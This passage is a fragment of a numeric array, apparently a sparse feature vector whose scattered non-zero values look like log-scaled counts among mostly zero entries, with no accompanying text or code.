0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.2626798770413155, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9957322735539913, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.772588722239781, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 3.258096538021482, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 5.567740402508133, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.3978952727983707, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, \n 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 4.969813299576001, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 5.961361141082371, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 20.561728078908178,\n 0.0, 4.825453896395787, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 2.8398715690385097, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0,\n 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 5.68697535633982, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 17.680622364027936, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 4.825453896395788, \n 2.302585092994046, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.631631038266565, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.5553480614894135, 0, 0.0, 0.0, 0, \n 0.0, 2.8398715690385097, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.736198448394496,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 3.4657359027997265, 0.0, 0.0, 0.0, 0.0, 0.0, 8.266085260861173, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 4.890349128221754, 0.0, 0.0, 0.0, 